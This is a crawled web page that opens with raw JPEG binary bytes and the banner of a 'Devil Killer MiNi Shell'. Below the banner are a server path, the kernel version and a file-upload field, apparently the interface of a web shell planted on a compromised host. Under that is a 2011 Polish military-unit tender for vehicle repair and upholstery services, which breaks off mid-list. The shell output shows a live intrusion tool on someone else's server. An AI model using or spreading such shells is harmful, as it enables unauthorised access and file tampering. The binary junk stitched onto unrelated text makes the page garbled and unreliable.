JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110418/117901-N-2011.html

<p class="kh_header"><b>Koszalin: Postępowanie w trybie przetargu nieograniczonego poniżej  125 000 euro
 na wykonanie przeglądów technicznych , napraw bieżących pojazdów samochodowych, regeneracji poszczególnych podzespołów  w pojazdach i naprawy tapicerki samochodowej nr postępowania 14-CZS-2011</b><br>
<b>Numer ogłoszenia: 117901 - 2011; data zamieszczenia: 18.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 1223 , ul. 4 Marca 5, 75-901 Koszalin, woj. zachodniopomorskie, tel. 094 3456260, faks 094 3456545.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OBRONA NARODOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie w trybie przetargu nieograniczonego poniżej  125 000 euro
 na wykonanie przeglądów technicznych , napraw bieżących pojazdów samochodowych, regeneracji poszczególnych podzespołów  w pojazdach i naprawy tapicerki samochodowej nr postępowania 14-CZS-2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zamówienia: Naprawa pojazdów osobowych i osobowo-terenowych, 

SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest: wykonanie w 2011 roku usługi przeglądów technicznych            i napraw bieżących pojazdów w ilościach i w czasie wynikających z bieżących potrzeb oraz  według wskazań pokładowych systemów kontroli sprawności a także przebiegu i czasu eksploatacji  pojazdów samochodowych w Jednostce Wojskowej 1223 Koszalin.
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina  a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjny. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonanie usługi nastąpi po uzgodnieniu zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego.
Wymagania:
1)	JW 1223 będzie dokonywała zapłaty za faktycznie wykonane naprawy (nie za dyspozycyjność zakładu). Naprawy są naprawami awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania wojskowych pojazdów mechanicznych, nie jest możliwe określenie ich częstości i rodzaju - grupy uszkodzeń (awarii).
2)	Dopuszcza się wykonywanie napraw przez podwykonawców pod warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
3)	Nie dopuszcza się zmian konstrukcyjnych pojazdów oraz ich podzespołów i układów.
4)	Części użyte do napraw będą  nowe. Dopuszcza się regeneracje podzespołów. Na  żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia części.
5)	Na wykonaną usługę zostanie udzielona minimum 3-miesieczna gwarancja a na nowe podzespoły gwarancja udzielona przez producenta .
6)	Cena części zużytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
7)	Cena zregenerowanego podzespołu nie może przekraczać 60% wartości nowego.  
8)	Awarie pojazdów zgłaszane będą doraźnie niezwłocznie po ich wystąpieniu. 
9)	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
10)	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów.
11)	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług i napraw, 
12)	Termin wykonania usługi naprawy pojazdu nie może być dłuższy niż 5 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Wykonawca zagwarantuje wykonanie napraw jednocześnie 1 (jednego) pojazdu z każdej z grup tj. osobowych, osobowo-terenowych, ciężarowych. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
13)	Materiały eksploatacyjne użyte w czasie naprawy muszą być zgodne z zaleceniem producenta pojazdu.
14)	Materiały użyte w czasie napraw a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
15)	Każdorazowa naprawa poprzedzona będzie wstępnym kosztorysem jej wykonania            (dostarczona przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
16)	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. halą naprawczą, właściwą ilością stanowisk naprawczych, wyposażeniem umożliwiającym usunięcie usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia oraz stosownym personelem.
17)	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.
18)	W przypadku awaryjnego uszkodzenia pojazdu ( reklamacja usługi )wykonawca na swój koszt odbierze pojazd z miejsca wskazanego przez zamawiającego z przestrzeganiem procedur obowiązujących w prawie o ruchu drogowym i  wykona naprawę  w terminie nie dłuższym niż 48 godziny licząc od momentu zgłoszenia faktu zaistnienia awarii.
Miejsce realizacji zamówienia: 
W zakładzie wykonującym usługę. 
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina        a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjny. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Przeglądy techniczne i  naprawy bieżące obejmują następujące pojazdy :

TYP, MARKA POJAZDU	r. prod.	szt	JW
Mercedes 290GD	1995	2	1223
Tarpan 4022 TC  	1995	1	1223
Honker 2000  	2004	3	1223
Honker 2424 	2003	2	1223
Honker 2424 	2004	4	1223
Honker 2424 	2005	2	1223

Planowana ilość pojazdów do naprawy  14 szt. w okresie trwania umowy 

PODANE ILOŚCI MOGĄ ULEC ZMIANIE W ZALEŻNOŚCI OD POTRZEB ZAMAWIAJĄCEGO

Zakres naprawy pojazdów  w zadaniu będzie obejmował następujące czynności - układy:
1.	 diagnostyka komputerowa silnika i jego układów;
2.	 diagnostyka poduszek i kurtyn powietrznych
3.	 obsługiwania okresowe wynikające ze wskazań komputera pokładowego
      przewidzianego dla danej marki;
4.	 naprawa układów pojazdu:
a) kierowniczego,
b) przeniesienia mocy,
c) hamulcowego,
d) zasilania paliwem i powietrzem,
e) naprawa instalacji elektrycznej,
f) naprawa zawieszenia pojazdu,
g naprawa osprzętu silnika,
h) naprawa wciągarki.
5.	 naprawa klimatyzacji;
6.	 naprawa zawieszenia;
7.	 naprawa układu hamulcowego;
8.	drobne naprawy blacharskie;
9.	renowacja powłoki lakierniczej.

Zakres naprawy podzespołów do pojazdów samochodowych będzie obejmował
1.	naprawę skrzyń biegów; 
2.	naprawę mostów napędowych; 
3.	regenerację wałów napędowych i resorów ;
4.	regenerację przekładni kierowniczych i pomp wtryskowych. 

W zakresie przedmiotowym napraw nie wchodzi wymiana akumulatorów, foteli, dywaników, pasów bezpieczeństwa.

Warunki odbioru usługi:
1.	Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania ) będzie protokół podpisany przez obie strony.
2.	W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył do naprawy pojazdu. 

Część II zamówienia: Naprawa pojazdów ciężarowych i autobusu

SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest: wykonanie w 2011 roku usługi przeglądów technicznych            i napraw bieżących pojazdów w ilościach i w czasie wynikających z bieżących potrzeb oraz  według wskazań pokładowych systemów kontroli sprawności a także przebiegu i czasu eksploatacji  pojazdów samochodowych w Jednostce Wojskowej 1223 Koszalin. 
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina        a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjny. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonanie usługi nastąpi po uzgodnienie zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego.

Wymagania:

1)	JW 1223 będzie dokonywała zapłaty za faktycznie wykonane naprawy (nie za dyspozycyjność zakładu). Naprawy są naprawami awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania wojskowych pojazdów mechanicznych, nie jest możliwe określenie ich częstości i rodzaju - grupy uszkodzeń (awarii).
2)	Dopuszcza się wykonywanie napraw przez podwykonawców pod warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
3)	Nie dopuszcza się zmian konstrukcyjnych pojazdów oraz ich podzespołów i układów.
4)	Części użyte do napraw będą  nowe. Dopuszcza się regeneracje podzespołów. Na  żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia części.
5)	Na wykonaną usługę zostanie udzielona minimum 3-miesieczna gwarancja a na nowe podzespoły gwarancja udzielona przez producenta .
6)	Cena części zużytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
7)	Cena zregenerowanego podzespołu nie może przekraczać 60% wartości nowego.  
8)	Awarie pojazdów zgłaszane będą doraźnie niezwłocznie po ich wystąpieniu. 
9)	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
10)	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów.
11)	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług i napraw, 
12)	Termin wykonania usługi naprawy pojazdu nie może być dłuższy niż 5 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Wykonawca zagwarantuje wykonanie napraw jednocześnie 1 (jednego) pojazdu z każdej z grup tj. osobowych, osobowo-terenowych, ciężarowych. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
13)	Materiały eksploatacyjne użyte w czasie naprawy muszą być zgodne z zaleceniem producenta pojazdu.
14)	Materiały użyte w czasie napraw a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
15)	Każdorazowa naprawa poprzedzona będzie wstępnym kosztorysem jej wykonania            (dostarczona przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
16)	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. halą naprawczą, właściwą ilością stanowisk naprawczych, wyposażeniem umożliwiającym usunięcie usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia oraz stosownym personelem.
17)	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.
18)	W przypadku awaryjnego uszkodzenia pojazdu ( reklamacja usługi )wykonawca na swój koszt odbierze pojazd z miejsca wskazanego przez zamawiającego z przestrzeganiem procedur obowiązujących w prawie o ruchu drogowym i  wykona naprawę  w terminie nie dłuższym niż 48 godziny licząc od momentu zgłoszenia faktu zaistnienia awarii.
Miejsce realizacji zamówienia: 
W zakładzie wykonującym usługę. 
Zamawiający dostarczy pojazd pod wskazany adres wykonawcy na terenie m. Koszalina a w przypadku realizacji usługi poza granicami administracyjnymi miasta, nie dalej niż do miejsca oddalonego o 20 km od granic administracyjnych. W przypadku większej odległości niż 20 km od granic administracyjnych miasta Koszalin  transport realizuje wykonawca usługi na własny koszt. 
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Przeglądy techniczne i  naprawy bieżące obejmują następujące pojazdy :

TYP, MARKA POJAZDU	r. prod.	szt	JW
Star 200 rok 1986	1986	1	1223
Star 200 rok 1988	1988	1	1223
Star 266	1980	8	1223
Star 944 (silnik MAN)	2005	4	1223
Ził 131	1980	4	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223

Planowana ilość pojazdów do naprawy  19 szt. w okresie trwania umowy 

PODANE ILOŚCI MOGĄ ULEC ZMIANIE W ZALEŻNOŚCI OD POTRZEB ZAMAWIAJĄCEGO

Zakres naprawy pojazdów  w zadaniu będzie obejmował następujące czynności - układy:
1.	diagnostyka komputerowa silnika i jego układów;
2.	diagnostyka poduszek i kurtyn powietrznych
3.	obsługiwania okresowe wynikające ze wskazań komputera pokładowego
      przewidzianego dla danej marki;
4.	naprawa układów pojazdu:
a) kierowniczego,
b) przeniesienia mocy,
c) hamulcowego,
d) zasilania paliwem i powietrzem,
e) naprawa instalacji elektrycznej,
f) naprawa zawieszenia pojazdu,
g naprawa osprzętu silnika,
h) naprawa wciągarki.
5.	naprawa klimatyzacji;
6.	naprawa zawieszenia;
7.	naprawa układu hamulcowego;
8.	naprawa powłoki lakierniczej z lakierowaniem
9.	drobne naprawy blacharskie;
10.	naprawa i regeneracja skrzyni ładunkowej
11.	naprawa i regeneracja ławek na skrzyni ładunkowej
12.	naprawa i regeneracja tapicerki samochodowej 


Zakres naprawy podzespołów do pojazdów samochodowych będzie obejmował
1.	naprawę skrzyń biegów; 
2.	naprawę mostów napędowych; 
3.	regenerację wałów napędowych i resorów ;
4.	regenerację przekładni kierowniczych i pomp wtryskowych. 

W zakresie przedmiotowym napraw nie wchodzi wymiana akumulatorów, foteli, dywaników, pasów bezpieczeństwa.

Warunki odbioru usługi:
1.	Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania naprawy ) będzie protokół stanu technicznego podpisany przez obie strony.
2.	W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył do naprawy pojazdu. 
Część III zamówienia: Usługi regeneracji poszczególnych podzespołów  w pojazdach:
SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest: wykonanie w 2011 roku usługi regeneracji poszczególnych podzespołów  w pojazdach:

TYP,MARKA POJAZDU	r.prod.	szt	JW
Mercedes 290GD	1995	1	1223
Tarpan 4022 TC 		1995	1	1223
Honker 2000 		2004	3	1223
Honker 2424	2003	2	1223
Honker 2424	2004	2	1223
Honker 2424	2005	2	1223
Star 200	1986	1	1223
Star 200	1988	1	1223
Star 944 (silnik MAN)	2004	2	1223
Star 944 (silnik MAN)	2005	2	1223
Star 944 (silnik MAN)	2006	1	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223
Star 29 Chlebowóz	1981	1	1223
IVECO sanitarka M40E 13WM	2008	2	1223
STAR 266 	1984	24	1223
ZIŁ 131	1983-1985	10	1223
ZIŁ157	1983-1985	6	1223
KRAZ 255	1983-1985	4	1223
MAN 40.464 DFAT	1999	1	1223

w ilościach i w czasie wynikających z bieżących potrzeb w Jednostce Wojskowej 1223 Koszalin. 
Wykonanie usługi nastąpi po uzgodnieniu zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego. 
Wymagania:
1.	Dopuszcza się wykonywanie regeneracji podzespołów przez podwykonawców pod
 warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
2.	Nie dopuszcza się zmian konstrukcyjnych regenerowanych podzespołów.
3.	Części użyte do regeneracji będą nowe. Na żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia części.
4.	Na wykonaną usługę zostanie udzielona minimum 6-miesieczna gwarancja od daty wykonania usługi 
5.	Cena części zużytych do naprawy nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
6.	Cena za zregenerowanie podzespołu nie może przekraczać 60% wartości nowego podzespołu. 
7.	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
8.	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych części zamiennych i materiałów.
9.	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług, 
10.	Termin wykonania usługi nie może być dłuższy niż 5 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
11.	Materiały eksploatacyjne użyte w czasie regeneracji muszą być zgodne z zaleceniem producenta danego podzespołu.
12.	Materiały użyte w czasie regeneracji a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
13.	Każdorazowa regeneracja podzespołów  poprzedzona będzie wstępnym kosztorysem jej wykonania (dostarczonego przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
14.	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. wyposażeniem umożliwiającym usunięci usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia  oraz stosownym personelem.
15.	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.
Miejsce realizacji zamówienia: 
 W zakładzie wykonującym usługę. Podzespoły przeznaczone do regeneracji wykonawca odbiera z siedziby zamawiającego i przekazuje od  siedziby zamawiającego na koszt własny, co uwzględnił w złożonej ofercie zapis ten nie dotyczy wykonawcy, którego zakład naprawczy mieści się na terenie m. Koszalin lub w odległości  do 20 km. od granic miasta       - w tym przypadku zamawiający sam dostarczy podzespoły i urządzenia do wykonawcy 
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Regeneracja poszczególnych części pojazdów  obejmuje:

Zakres  regeneracji  w zadaniu będzie obejmował następujące czynności  :

1. regenerację skrzyń biegów;
2. regenerację skrzyń rozdzielczych;
3. regenerację mostów napędowych;
4. regenerację wałów napędowych;
5. regenerację resorów;
6. regenerację przekładni kierowniczych;
7. regenerację pomp wspomagania układu kierowniczego;
8. regenerację pomp wtryskowych;
9. regenerację sprężarek;
10. regenerację mechanizmów wspomagania hamulców;
11. regenerację głowic silnikowych
12.	regenerację rozruszników;
13.	regenerację alternatorów
14.	regenerację wtryskiwaczy
15.	regenerację podnośników samochodowych 
Wyżej wymieniony zakres regenerowanych podzespołów obejmuje wszystkie pojazdy wymienione w części III zamówienia.

Warunki odbioru usługi:

1. Potwierdzeniem wykonanej usługi ( jej zakres i prawidłowość wykonania naprawy ) będzie protokół  odbioru podpisany przez obie strony.
2. W fakturze zostaną wymienione części, materiały i roboczogodziny, które wykonawca zużył         
    do regeneracji podzespołów.

Część IV zamówienia: Usługi w zakresie naprawy tapicerki samochodowej:
SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest: wykonanie w 2011 w zakresie naprawy tapicerki samochodowej:
TYP,MARKA POJAZDU	r.prod.	szt	JW
Mercedes 290GD	1995	1	1223
Tarpan 4022 TC 		1995	1	1223
Honker 2000 		2004	3	1223
Honker 2424	2003	2	1223
Honker 2424	2004	2	1223
Honker 2424	2005	2	1223
Star 200	1986	1	1223
Star 200	1988	1	1223
Star 944 (silnik MAN)	2004	2	1223
Star 944 (silnik MAN)	2005	2	1223
Star 944 (silnik MAN)	2006	1	1223
Autobus pasażerski Autosan H-10-10	2000	1	1223
Star 29 Chlebowóz	1981	1	1223
IVECO sanitarka M40E 13WM	2008	2	1223
STAR 266 	1984	24	1223
ZIŁ 131	1983-1985	10	1223
ZIŁ157	1983-1985	6	1223
KRAZ 255	1983-1985	4	1223
MAN 40.464 DFAT	1999	1	1223

w ilościach i w czasie wynikających z bieżących potrzeb w Jednostce Wojskowej 1223 Koszalin. 
Wykonanie usługi nastąpi po uzgodnieniu zakresu naprawy oraz zatwierdzeniu kosztorysu wykonawcy przez zamawiającego. 
Wymagania:
1.	Dopuszcza się wykonywanie naprawy tapicerki przez podwykonawców pod
 warunkiem, że wykonawca weźmie pełną odpowiedzialność za część prac wykonanych przez podwykonawcę - zamawiający nie dopuszcza faktur częściowych  od podwykonawców.
2.	Nie dopuszcza się zmian konstrukcyjnych naprawianych elementów tapicerki.
3.	materiały użyte do naprawy będą nowe. Na żądanie zamawiającego usługę wykonawca przedstawi źródło pochodzenia materiałów.
4.	Na wykonaną usługę zostanie udzielona minimum 6-miesieczna gwarancja od daty wykonania usługi 
5.	Cena części zużytych materiałów nie może przekraczać rzeczywistej udokumentowanej ceny nabycia wraz z należnym podatkiem i marżą.
6.	Cena za naprawę nie może przekraczać 60% wartości nowego elementu. 
7.	Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki.
8.	Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych materiałów.
9.	Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez podwykonawców)  usług, 
10.	Termin wykonania usługi nie może być dłuższy niż 7 dni roboczych od daty akceptacji kosztorysu wykonania naprawy przez zamawiającego. Termin wykonania usługi może ulec przedłużeniu za zgodą zamawiającego.
11.	Materiały eksploatacyjne użyte w czasie naprawy musza być zgodne z zaleceniem producenta danego podzespołu.
12.	Materiały użyte w czasie naprawy a stanowiące zagrożenie dla środowiska naturalnego zostaną zutylizowane przez wykonawcę. 
13.	Każdorazowa naprawa  poprzedzona będzie wstępnym kosztorysem jej wykonania (dostarczonego przez wykonawcę do zamawiającego). Rozpoczęcie usługi może odbyć się tylko i wyłącznie po akceptacji kosztorysu przez zamawiającego.
14.	Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym mogącym zapewnić spełnienie warunków zamówienia tj. wyposażeniem umożliwiającym usunięci usterek (awarii) przedstawionych poniżej w opisie przedmiotu zamówienia  oraz stosownym personelem.
15.	Faktura za wykonaną usługę w treści musi zawierać koszt ogólny  wykonanych usług i napraw, w załączniku do faktury wykonawca opisuje operacje wykonane podczas wykonywania usługi.
Miejsce realizacji zamówienia: 
 W zakładzie wykonującym usługę. Podzespoły przeznaczone do naprawy wykonawca odbiera z siedziby zamawiającego i przekazuje od  siedziby zamawiającego na koszt własny, co uwzględnił w złożonej ofercie -zapis ten nie dotyczy wykonawcy, którego zakład naprawczy mieści się na terenie m. Koszalin lub w odległości  do 20 km. od granic miasta- w tym przypadku zamawiający sam dostarczy podzespoły i urządzenia do wykonawcy -
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. (art.36 ust.5 Pzp). Zamawiający żąda wskazania w wybranej ofercie przez Wykonawcę w jakim zakresie powierzy wykonanie usługi podwykonawcom.

Termin wykonania zamówienia: od dnia zawarcia umowy do 30.11.2011r. 

Naprawa poszczególnych elementów tapicerki samochodowej  obejmuje:

Zakres  naprawy w zadaniu będzie obejmował następujące czynności  :

1. naprawa siedzeń;
